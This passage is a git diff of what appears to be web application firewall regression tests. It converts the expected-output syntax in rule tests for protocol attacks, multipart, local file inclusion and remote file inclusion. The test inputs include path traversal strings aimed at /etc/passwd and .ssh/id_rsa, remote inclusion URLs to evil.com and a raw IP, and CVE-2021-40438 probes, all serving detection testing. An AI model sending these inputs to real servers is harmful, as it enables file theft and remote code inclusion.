log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 6 desc: "Testing for rule, this should trigger" stages: @@ -99,7 +104,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 7 desc: "Testing for rule, this should trigger" stages: @@ -115,7 +121,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 8 desc: "Testing for rule, this should trigger" stages: @@ -131,7 +138,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 9 desc: "Testing for rule, this should trigger" stages: @@ -147,7 +155,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 10 desc: "Testing for rule, this should trigger" stages: @@ -163,4 +172,5 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml index 44347f128..d338384ff 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml @@ -17,7 +17,8 @@ tests: uri: "/?foo[1]a=bar&foo[1]b=<evil>" version: "HTTP/1.1" output: - log_contains: id "921210" + log: + expect_ids: [921210] - test_id: 2 desc: "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name" stages: @@ -31,7 +32,8 @@ tests: uri: "/?foo[1]a[2]=bar" version: "HTTP/1.1" output: - log_contains: id "921210" + log: + expect_ids: [921210] - test_id: 3 desc: "HTTP Parameter Pollution false positive test" stages: @@ -45,4 +47,5 @@ tests: uri: "/?foo[1][2]=bar" version: "HTTP/1.1" output: - no_log_contains: id "921210" + log: + no_expect_ids: [921210] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml index e5b4235e0..a255b5a10 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml @@ -18,4 +18,5 @@ tests: uri: "/get?foo[1]=bar" version: "HTTP/1.1" output: - log_contains: id "921220" + log: + expect_ids: [921220] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml index ad2d3659f..a63c737b7 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml @@ -18,4 +18,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "921230" + log: + expect_ids: [921230] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml index 8272c730a..15915dff1 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml @@ -17,7 +17,8 @@ tests: uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" version: "HTTP/1.1" output: - log_contains: id "921240" + log: + expect_ids: [921240] - test_id: 2 desc: "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded" stages: @@ -31,4 +32,5 @@ tests: uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" version: "HTTP/1.1" output: - log_contains: id "921240" + log: + expect_ids: [921240] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml index 61c80b4fd..060b8d368 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml @@ -18,7 +18,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: @@ -33,7 +34,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -48,7 +50,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -63,7 +66,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -78,7 +82,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 6 desc: Negative test for 921421-1 stages: @@ -93,7 +98,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 7 desc: Negative test for 921421-2 stages: @@ -108,7 +114,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 8 desc: Negative test for 921421-3 stages: @@ -123,7 +130,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 9 desc: Negative test for 921421-4 stages: @@ -138,7 +146,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 10 desc: Negative test for 921421-5 stages: @@ -153,7 +162,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 11 desc: Negative test for rule 921421-6 stages: @@ -168,7 +178,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 12 desc: Negative test for rule 921421-7 stages: @@ -183,4 +194,5 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml index 5d69957ec..e5b83d50b 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml @@ -18,7 +18,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: @@ -33,7 +34,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -48,7 +50,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -63,7 +66,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -78,7 +82,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 6 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -93,7 +98,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 7 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -108,7 +114,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 8 desc: Bypass targeting recommended rules (rule 200001) stages: @@ -123,7 +130,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 9 desc: Negative test for 921422-1 stages: @@ -138,7 +146,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 10 desc: Negative test for 921422-2 stages: @@ -153,7 +162,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 11 desc: Negative test for 921422-3 stages: @@ -168,7 +178,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 12 desc: Negative test for 921422-4 stages: @@ -183,7 +194,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 13 desc: Negative test for 921422-5 stages: @@ -198,7 +210,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 14 desc: Negative test for 921422-6 stages: @@ -213,7 +226,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 15 desc: Negative test for rule 921422-7 stages: @@ -228,7 +242,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 16 desc: Negative test for rule 921422-8 stages: @@ -243,7 +258,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 17 desc: Negative test for rule 921422-9 stages: @@ -258,4 +274,5 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml index df7716d78..710fae5c3 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml @@ -30,7 +30,8 @@ tests: Let me see if I can use utf-7. --boundary-- output: - log_contains: id "922100" + log: + expect_ids: [922100] - test_id: 2 desc: "Negative test: only allowed charsets when using _charset_" stages: @@ -57,7 +58,8 @@ tests: This should be good as we use utf-8 that is allowed. --boundary-- output: - no_log_contains: id "922100" + log: + no_expect_ids: [922100] - test_id: 3 desc: "Positive test: don't allow substrings of valid charsets when using _charset_" stages: @@ -84,4 +86,5 @@ tests: utf-8 is valid but utf- should not be. --boundary-- output: - log_contains: id "922100" + log: + expect_ids: [922100] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml index ab02ff01a..90b479f2f 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml @@ -30,7 +30,8 @@ tests: Knock knock. --boundary-- output: - log_contains: id "922110" + log: + expect_ids: [922110] - test_id: 2 desc: "Negative test: utf-8 is allowed" stages: @@ -57,4 +58,5 @@ tests: I shold be allowed to get in. --boundary-- output: - no_log_contains: id "922110" + log: + no_expect_ids: [922110] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml index c3d6693a2..fe49ae15b 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml @@ -27,7 +27,8 @@ tests: Pineapple. Pizza. --boundary-- output: - log_contains: id "922120" + log: + expect_ids: [922120] - test_id: 2 desc: "Negative test: no content-transfer-encoding header should be good" stages: @@ -50,4 +51,5 @@ tests: This should be good as there is no content-transfer-encoding header. --boundary-- output: - no_log_contains: id "922120" + log: + no_expect_ids: [922120] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml index 8a35994d4..d9a96df21 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml @@ -19,7 +19,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] - test_id: 2 desc: "Path Traversal Attack Triple Dot (/.../)" stages: @@ -34,7 +35,8 @@ tests: uri: "/get?foo=.../.../WINDOWS/win.ini" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] - test_id: 3 desc: "Path Traversal Attack Triple Dot (/.../) encoded: foo=.../.../WINDOWS/win.ini" stages: @@ -49,7 +51,8 @@ tests: uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] - test_id: 4 desc: "Status Page Test - Path Traversal Attack (<backslash>../), partially encoded" stages: @@ -65,4 +68,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index 75eccd74a..b217eaa0b 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml @@ -19,7 +19,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 2 desc: "Path Traversal Attack (/../) query string" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?arg=../../../etc/passwd" version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 3 desc: "Path Traversal Attack (/../) query string" stages: @@ -51,7 +53,8 @@ tests: data: "arg=../../../etc/passwd&foo=var" version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 4 desc: "Path Traversal Attack (/../) query string" stages: @@ -66,7 +69,8 @@ tests: uri: "/get/foo../1234" version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 5 desc: "Path Traversal Attack (/../) query string" stages: @@ -81,7 +85,8 @@ tests: uri: "/get/foo.../1234" version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 6 desc: "Path Traversal Attack (/../) query string" stages: @@ -96,7 +101,8 @@ tests: uri: "/get/..foo" version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 7 desc: "Path Traversal Attack (/../) query string" stages: @@ -111,7 +117,8 @@ tests: uri: "/get/.." version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 8 desc: 'Path Traversal Attack (..\) query string' stages: @@ -126,7 +133,8 @@ tests: uri: '/get?arg=..\pineapple' version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 9 desc: 'Path Traversal Attack triple dot (.../) query string' stages: @@ -141,7 +149,8 @@ tests: uri: '/get?foo=.../.../WINDOWS/win.ini' version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 10 desc: 'Path Traversal Attack (../) file upload' stages: @@ -164,7 +173,8 @@ tests: ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 11 desc: 'Path Traversal Attack (..\) file upload' stages: @@ -187,7 +197,8 @@ tests: ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 12 desc: "Path Traversal Attack (;..;) query string" stages: @@ -203,4 +214,5 @@ tests: uri: "/get?a=..;.\\.;\\." version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index e9ead764a..3a2b2268b 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -22,7 +22,8 @@ tests: uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 2 desc: Remote File Access Attempt (930120) from old modsec regressions stages: @@ -42,7 +43,8 @@ tests: uri: "/get/index.php?file=News&op=/etc/passwd%00" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 3 desc: Remote File Access Attempt (930120) from old modsec regressions stages: @@ -62,7 +64,8 @@ tests: uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 4 desc: "OS File Access" stages: @@ -77,7 +80,8 @@ tests: uri: "/get?foo=arg&path_comp=.ssh/id_rsa" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 5 desc: "LFI via parameter name: /sys" stages: @@ -92,7 +96,8 @@ tests: uri: "/get?/sys/class=test" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 6 desc: "LFI via parameter value: /sys" stages: @@ -107,7 +112,8 @@ tests: uri: "/get?test=/sys/class" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 7 desc: "LFI via parameter value: /etc/subuid" stages: @@ -122,7 +128,8 @@ tests: uri: "/get?code=cat+%2Fetc%2Fsubuid" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 8 desc: "LFI via parameter value: /etc/subuid-" stages: @@ -137,7 +144,8 @@ tests: uri: "/get?code=cat+%2Fetc%2Fsubuid-" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 9 desc: | YM9WT5NU @@ -154,7 +162,8 @@ tests: uri: "/get?code=>/tmp/curl" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 10 desc: | YM9WT5NU @@ -171,4 +180,5 @@ tests: uri: "/get?code=>/tmp" version: "HTTP/1.1" output: - no_log_contains: id "930120" + log: + no_expect_ids: [930120] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index 6bee94f87..6eda72ce1 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml @@ -21,7 +21,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 2 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -41,7 +42,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 3 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -61,7 +63,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 4 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -81,7 +84,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 5 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -101,7 +105,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 6 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -121,7 +126,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 7 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -141,7 +147,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 8 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -161,7 +168,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 9 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -181,7 +189,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 10 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: @@ -201,4 +210,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index 8b0a1c6f3..79f562df5 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -18,7 +18,8 @@ tests: uri: "/get/sys/class" version: "HTTP/1.1" output: - log_contains: id "930130" + log: + expect_ids: [930130] - test_id: 2 desc: "LFI via URI: /proc" stages: @@ -33,4 +34,5 @@ tests: uri: "/get/proc/interrupts" version: "HTTP/1.1" output: - log_contains: id "930130" + log: + expect_ids: [930130] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index 368dd5005..ca85a2736 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -22,4 +22,5 @@ tests: uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" version: "HTTP/1.1" output: - log_contains: id "931100" + log: + expect_ids: [931100] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index d5983803d..37f4e627c 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -22,7 +22,8 @@ tests: uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" version: "HTTP/1.1" output: - log_contains: id "931110" + log: + expect_ids: [931110] - test_id: 2 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: @@ -42,7 +43,8 @@ tests: uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" version: "HTTP/1.1" output: - log_contains: id "931110" + log: + expect_ids: [931110] - test_id: 3 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: @@ -62,4 +64,5 @@ tests: uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" version: "HTTP/1.1" output: - log_contains: id "931110" + log: + expect_ids: [931110] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 5a4050483..0b95fd320 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?x=file?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 2 desc: Remote File Inclusion Attack (931120) stages: @@ -32,7 +33,8 @@ tests: uri: "/get?x=ftp?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 3 desc: Remote File Inclusion Attack (931120) stages: @@ -47,7 +49,8 @@ tests: uri: "/get?x=ftps?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 4 desc: Remote File Inclusion Attack (931120) stages: @@ -62,7 +65,8 @@ tests: uri: "/get?x=http?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 5 desc: Remote File Inclusion Attack (931120) stages: @@ -77,7 +81,8 @@ tests: uri: "/get?x=https?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 6 desc: Remote File Inclusion Attack (931120) stages: @@ -92,7 +97,8 @@ tests: uri: "/get?x=https://foo.bar?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 7 desc: Remote File Inclusion Attack (931120) stages: @@ -107,7 +113,8 @@ tests: uri: "/get?x=https://foo.bar?foo=bar" version: HTTP/1.1 output: - no_log_contains: id "931120" + log: + no_expect_ids: [931120] - test_id: 8 desc: Remote File Inclusion Attack (931120) stages: @@ -122,4 +129,5 @@ tests: uri: "/get?x=https://foo.bar&foo=bar" version: HTTP/1.1 output: - no_log_contains: id "931120" + log: + no_expect_ids: [931120] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 56524bf51..19e752d02 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?x=file://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 2 desc: Remote File Inclusion Attack (931130) stages: @@ -32,7 +33,8 @@ tests: uri: "/get?x=ftp://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 3 desc: Remote File Inclusion Attack (931130) stages: @@ -47,7 +49,8 @@ tests: uri: "/get?x=ftps://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 4 desc: Remote File Inclusion Attack (931130) stages: @@ -62,7 +65,8 @@ tests: uri: "/get?x=http://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 5 desc: Remote File Inclusion Attack (931130) stages: @@ -77,7 +81,8 @@ tests: uri: "/get?x=https://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 6 desc: Partial match stages: @@ -92,7 +97,8 @@ tests: uri: "/get?x=https://evilexample.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 7 desc: Mismatching domains stages: @@ -107,7 +113,8 @@ tests: uri: "/get?x=https://example.com.evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 8 desc: Mismatching ports stages: @@ -122,7 +129,8 @@ tests: uri: "/get?x=https://example.com:1234/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 9 desc: Matching hosts stages: @@ -137,7 +145,8 @@ tests: uri: "/get?x=https://example.com/" version: HTTP/1.1 output: - no_log_contains: id "931130" + log: + no_expect_ids: [931130] - test_id: 10 desc: Matching hosts and ports stages: @@ -152,7 +161,8 @@ tests: uri: "/get?x=https://example.com:1234/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 11 desc: Subdomains stages: @@ -167,7 +177,8 @@ tests: uri: "/get?x=http://www.example.com/some/path" version: HTTP/1.1 output: - no_log_contains: id "931130" + log: + no_expect_ids: [931130] - test_id: 12 desc: Bypass 1 stages: @@ -182,7 +193,8 @@ tests: uri: "/get?x=http://example.com%2f:asd@evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 13 desc: Bypass 2 stages: @@ -197,7 +209,8 @@ tests: uri: "/get?x=http://example.com%2f@evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 14 desc: Bypass 3 stages: @@ -212,7 +225,8 @@ tests: uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 15 desc: basic auth stages: @@ -227,7 +241,8 @@ tests: uri: "/get?x=http://foo:bar@example.com/" version: HTTP/1.1 output: - no_log_contains: id "931130" + log: + no_expect_ids: [931130] - test_id: 16 desc: "Positive test: Remote File Inclusion Attack (931130) - Detect url:file://" stages: @@ -242,7 +257,8 @@ tests: uri: "/get?x=url:file://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 17 desc: Remote File Inclusion Attack (931130) - Detect gopher:// stages: @@ -257,7 +273,8 @@ tests: uri: "/get?x=gopher://google.com/_SSRFTest!" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 18 desc: Remote File Inclusion Attack (931130) - Ldap Protocol stages: @@ -272,7 +289,8 @@ tests: uri: 